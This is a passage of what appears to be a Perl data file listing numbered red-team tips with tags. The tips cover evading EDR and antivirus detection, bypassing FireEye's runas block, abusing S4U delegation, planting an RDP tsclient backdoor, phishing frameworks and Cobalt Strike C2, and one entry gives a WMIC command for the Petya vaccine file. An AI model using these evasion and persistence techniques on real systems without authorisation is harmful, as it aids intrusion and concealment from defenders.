https://hashcat.net/forum/thread-5912.html', tags => @( 1360 | 'redtip', '#213', 'NTLM', 'hash', 'cracking', 'DES' 1361 | ) 1362 | ), 1363 | %(tips => 'Red tip #214: If you don’t 100 percent understand NETNTLMv1 and v2 read up on https://blog.smallsec.ca/2016/11/21/ntlm-challenge-response/', tags => @( 1364 | 'redtip', '#214', 'NTLM', 'NTLMv2', 'blog', 'hashing' 1365 | ) 1366 | ), 1367 | %(tips => 'Red tip #215: If you don’t know how LM and NTLM hashing works... go back to basics with https://blog.smallsec.ca/2016/11/07/windows-credentials/', tags => @( 1368 | 'redtip', '#215', 'LM', 'NTLM', 'hashing', 'windows', 'credentials' 1369 | ) 1370 | ), 1371 | %(tips => 'Red tip #216: @424f424f just made me aware that FireEye can prevent runas from executing. Use unmanaged PS to spawn https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/RunAs.ps1', tags => @( 1372 | 'redtip', '#216', 'FireEye', 'runas', 'unmanaged', 'powershell' 1373 | ) 1374 | ), 1375 | %(tips => 'Red tip #217: S4U can be used to delegate across SPN. So if you have msds-allowedtodelagateto HTTP you can exploit to obtain HOST and CIFS', tags => @( 1376 | 'redtip', '#217', 'S4U', 'SPN', 'HTTP', 'host', 'CIFS' 1377 | ) 1378 | ), 1379 | %(tips => 'Red tip #218: You’re in a subnet where people RDP into but you can’t attack outwards? Set backdoor over tsclient on start keys. :sunglasses:', tags => @( 1380 | 'redtip', '#218', 'subnet', 'RDP', 'backdoor', 'tsclient' 1381 | ) 1382 | ), 1383 | %(tips => 'Red tip #219: Unsure what the localised admin account might be called or need to copy and paste? Check out https://social.technet.microsoft.com/wiki/contents/articles/13813.localized-names-for-administrator-account-in-windows.aspx', tags => @( 1384 | 'redtip', '#219', 'admin', 'account', 'windows', 'copy', 'paste' 1385 | ) 1386 | ), 1387 | %(tips => 'Red tip #220: EDR monitoring “whoami”? Use echo %userprofile%; echo %username%. Or replace echo with anything that reflects error: ie. set', tags => @( 1388 | 'redtip', '#220', 'EDR', 'whoami', 'echo', 'environment variables', 'set' 1389 | ) 1390 | ), 1391 | %(tips => 'Red tip #221: Network segregation in play? Try Get-NetSubnet, Get-NetSite in PowerView or browse in AD explorer. Can help find your way :)', tags => @( 1392 | 'redtip', '#221', 'Network', 'segregation', 'Netsite', 'PowerView', 'AD' 1393 | ) 1394 | ), 1395 | %(tips => 'Red tip #222: If you want to simulate MBR activity like #Petya, check out https://github.com/PowerShellMafia/PowerSploit/blob/master/Mayhem/Mayhem.psm1', tags => @( 1396 | 'redtip', '#222', 'MBR', 'Petya', 'Mayhem', 'activity' 1397 | ) 1398 | ), 1399 | %(tips => 'Red tip #223: Secure your beach heads against #Petya WMIC /node:host process call create “echo > C:\windows\perfc”', tags => @( 1400 | 'redtip', '#223', 'wmic', 'Petya', 'host', 'process', 'echo' 1401 | ) 1402 | ), 1403 | %(tips => 'Red tip #224: Using Linux? Modify /etc/dhcp/dhclient.conf and remove gethostname() for Opsec when you VPN or have to rock up on site.', tags => @( 1404 | 'redtip', '#224', 'linux', 'dhcp', 'opsec', 'VPN', 'site' 1405 | ) 1406 | ), 1407 | %(tips => 'Red tip #225: Stuck in a heavily segregated situation on a server? Try RDPInception attack vector out https://www.mdsec.co.uk/2017/06/rdpinception/', tags => @( 1408 | 'redtip', '#225', 'segregated', 'server', 'RDP', 1409 | ) 1410 | ), 1411 | %(tips => 'Red tip #226: Reduce AV detection by using fake Microsoft certificate.', tags => @( 1412 | 'redtip', '#226', 'AV', 'microsoft', 'certificate', 'detection' 1413 | ) 1414 | ), 1415 | %(tips => 'Red tip #227: Not using notifications yet for C2 events? For @armitagehacker Cobalt Strike check out', tags => @( 1416 | 'redtip', '#227', 'notifications', 'C2', 'events', 'CobaltStrike' 1417 | ) 1418 | ), 1419 | %(tips => 'Red tip #228: Need a fully fledged phishing framework? Check out the amazing Fierce Phish by @Raikiasec <3 https://github.com/Raikia/FiercePhish', tags => @( 1420 | 'redtip', '#228', 'phishing', 'framework', 'FiercePhish', 'King', 'Raikiasec' 1421 | ) 1422 | ), 1423 | ); 1424 | 1425 | sub get_database { 1426 | return @database; 1427 | return @tips; 1428 | } 1429 | --------------------------------------------------------------------------------